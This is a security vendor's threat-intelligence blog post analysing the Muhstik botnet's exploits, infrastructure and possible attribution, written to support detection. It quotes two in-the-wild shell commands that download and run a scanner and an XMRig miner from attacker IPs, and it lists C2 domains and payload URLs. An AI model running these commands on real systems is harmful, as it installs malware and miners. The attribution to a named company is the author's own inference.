Meet Muhstik – IoT Botnet Infecting Cloud Servers

Chris Hall
Cloud Security Researcher, Lacework Labs

Cloud infrastructure is generally immune to IoT related threats however there are some exceptions – one of these is “Muhstik”. The Muhstik botnet has been around for a couple years now and is currently affecting the cloud by way of several web application exploits. The botnet is monetized via XMRig, cgmining and with DDoS attack services. This blog takes a look at related activity and explores Muhstik’s intrusion infrastructure and possible attribution.

Muhstik leverages IRC for its command and control and has consistently used the same infrastructure since its inception. The primary method of propagation for IoT devices is via home routers however there are multiple attempted exploits for Linux server propagation. Targeted routers include GPON home router, DD-WRT router, and the Tomato router

Web application exploits include those for Drupal, and Weblogic:

Muhstik exploited vulnerability

Description

CVE-2019-2725

Oracle WebLogic Server RCE

CVE-2017-10271

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware

CVE-2018-7600

Drupal RCE

 

A typical attack will leverage several stages, the first is the payload which downloads the other components. The payload is named “pty” followed by a number which maps to the architecture.  Download URL examples:

  • hxxp://159.89.156.190/.y/pty2
  • hxxp://167.99.39.134/.x/pty3

Upon successful installation Mushtik will contact the IRC channel to receive commands. (For more details on the Muhstik protocol, refer to the write up by Subexsecure). Usually Muhstik will be instructed to download an XMRmrig miner and a scanning module. The scanning module is used for growing the botnet through targeting other Linux servers and home routers.

The following are example bash commands seen in the wild for installing the scanner and miner respectively:

sh -c export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;(ps aux | grep -v grep | grep knthread > /dev/null) || curl -o /tmp/baste http://128.199.251.119/.x/baste; chmod +x /tmp/baste; chmod 700 /tmp/baste; /tmp/baste &

sh -c export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;(curl –max-time 75 –retry 5 -O /tmp/xmra64 http://188.213.174.29/wp-content/themes/twentysixteen/xmra64; chmod +x /tmp/xmra64; /tmp/xmra64 -o 185.86.148.14:8081 -o 185.165.171.78:8081 -B) > /dev/null 2>&1 &

Both the Muhstik payload and scanning module encrypt their configurations using the Mirai source code which employs a single byte XOR of 0x22. The IRC hosts are observable in the decrypted configuration. The configurations very however all contain one or more of the following, along with their resolved IPs (IPs vary specimen to specimen depending on current resolution)

  • irc.de-zahlung.eu
  • irc.deutschland-zahlung.net
  • irc.deutschland-zahlung.eu
  • irc.shadow-mods.net

The XMRmrig miner was configured with xmr.shadow-mods.net which uses the same second level as the scanner reporting C2 and one of the payload IRC channels.

Example 1: Decrypted payload config:

“””
“””irc.de-za””” g””listening tun0 “46.149.233.35 “”185.61.149.22 “”irc.de-zahlung.eu “”irc.deutschland-zahlung.net “”””68.66.253.100 “”173.255.240.191 “”””51.210.8.207 “””162.249.2.189 “”185.62.137.56 “”/proc/ “/exe “””/status “”””/fd “”””\x58\x4D\x4E\x4E\x43\x50\x46\x22 “””zollard “”””muhstik-11052018 “””l0 “eth1 “””lan0 “””- “”eth0 “””inet0 “”lano “””d4cf8e4ab26f7fd15ef7df9f7937493d “””

 

Example 2: Decrypted Scanning module config:

“”cnc.changeme.com ” “s.shadow-mods.net “”¸”listening tun0 “https://youtu.be/dQw4w9WgXcQ “/proc/ “/exe ” (deleted) “/fd “.anime “/status “REPORT %s:%s “HTTPFLOOD “LOLNOGTFO “”””\x58\x4D\x4E\x4E\x43\x50\x46\x22 “zollard “GETLOCALIP “shell “enable “system “sh “/bin/busybox MIRAI “MIRAI: applet not found “ncorrect “/bin/busybox ps “/bin/busybox kill -9  “TSource Engine Query “/etc/resolv.conf “nameserver  “Connection: keep-alive “””Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 “””””Accept-Language: en-US,en;q=0.8 “”””””””Content-Type: application/x-www-form-urlencoded “setCookie(‘ “refresh: “location: “set-cookie: “content-length: “transfer-encoding: “chunked “keep-alive “connection: “server: dosarrest “server: cloudflare-nginx “””””Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 “Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 “”Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 “”Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2

 

File specimens with the Muhstik configs can be identified with the following sequence of bytes which is the XOR’d value of the “muhstik” keyword. Note: Several muhstik payloads are UPX packed so they this is only observable in unpacked binaries:

 

4F 57 4A 51 56 4B 49 0F

 

The decoded configuration for the Muhstik scanning module has common settings seen in many Mirai -based variants. These include

  • Memory scraping settings. This functionality is used for killing competing malware. In this case there were parameters for the Zollard IoTIOT botnet:
    • “”””\x58\x4D\x4E\x4E\x43\x50\x46\x22 “zollard.
  • An unused RickRoll : https://youtu.be/dQw4w9WgXcQ

Infrastructure & Attribution

Examination of Muhstik’s attack infrastructure exposed some interesting correlations. IRC C2 irc.de-zahlung.eu was found to be sharing an SSL cert with site jaygame.net. Jaygame.net is an amateur site about a game involving an Anime character named ‘Jay’. The site is currently leveraging Google Analytics ID UA-120919167-1.

A reverse Google Analytics search exposed 3 domains with records for the same ID:

  • jaygame.net
  • fflyy.su
  • kei.su
  

Figure 1: Jaygame.net

The two other domains linked to the analytics ID (ffly.su and kei.su) were also configured as C2s for various other Linux Tsunami malware linked to the same infrastructure. If the infrastructure is administered by a single attacker then we can presume it’s related. 

  

Figure 2: Muhstik Infrastructure links

This related infrastructure has allowed possible attribution to what Lacework has dubbed “Wasp 8220”. This set of activity has been tied to other cryptomining variants and Linux backdoors . These all have links to the same malware upload path belonging to Chinese forensics firm Shen Zhou Wang Yun Information Technology Co., Ltd. The following are related Virus Total submission artifacts. In all cases, these were seen prior to attacks in the wild and prior to the infrastructure becoming operational. Also, the original specimens were only uploaded one-time suggesting Shen Zhou Wang Yun is likely the malware originator and not simply the first uploader. One of the uploads (.x_3sh) had zero detections and appears to be the first Muhstik downloader.

Virus Total Upload PathDateDescription

/home/wys/shenzhouwangyun/shell/downloadFile/tomato.deutschland-zahlung.eu_nvr

 

2018-12-22

upload path has reference for Muhstik domain deutschland-zahlung.eu

/home/wys/shenzhouwangyun/shell/downloadFile/y.fd6fq54s6df541q23sdxfg.eu_nvr 2018-11-06upload path has reference for Muhstik domain fd6fq54s6df541q23sdxfg.eu
/home/wys/shenzhouwangyun/shell/downloadFile/o.kei.su_qn2018-11-27Upload path has reference for Muhstik domain kei.su
/home/wys/shenzhouwangyun/shell/downloadFile/.x_3sh2018-11-11Muhstik installer
/home/wys/shenzhouwangyun/shell/downloadFile/.x_mine 2018-11-27Linked by way of domain derpcity.ru which was seen in malware also configured with fflyy.su and kei.su.  File has URL with  77.233.160.103 which is passive DNS host for derpcity.ru.

 

  

Figure 3: Original Muhstik installer script (uploaded by Shen Zhou Wang Yun Information Technology Co., Ltd)

Other characteristics of note in Muhstik malware and infrastructure were numerous references to Anime. The following table lists references observed in Muhstik activity:

Indicator

Notes

jaygame.net

The site’s content and image describes an anime themed game

Kei.su

Japanese name “Kei” – possible reference to several different Anime characters

Pokemoninc.com

Clear reference to Pokemon

Keiku doori

Malware string seen in several specimens. This is aThis a misspelling of keikaku doori which is Japanese for “Just as Planned”. Most likely a reference to Anime Death note

nandemo shiranai wa yo shitteru koto dake

Malware string. A Japanese saying seen in several Anime memes

https://www.youtube.com/watch?v=Jzqy6UJXpcQ

Now removed but used to be music from anime GochiUsa. Used in botnet protocol from related Irc botnet

 

Anime references are not unique to Muhstik however it was a common theme worth highlighting.  

For example in 2015, the “cereal” IoT botnet was also observed downloading Anime videos as part of an alleged hobby project . Also, .anime was a frequent process artifact in IoT malware variants and was targeted by Mirai’s memory scraping module. This is observable in the decoded config for the Muhstik scanner module. For IoTs botnets of Chinese origin, this would make sense due to the massive popularity of Anime in China.  

The Muhstik botnet has been using the same C2 domains for the last two years so the provided indicators will likely help with detecting any existing Muhstik infections. As far as prevention, we highly recommend regular scans for the vulnerabilities listed in table 1. 

If you’d like to learn more about how Lacework can automate host vulnerability scanning in the cloud, then please reach out!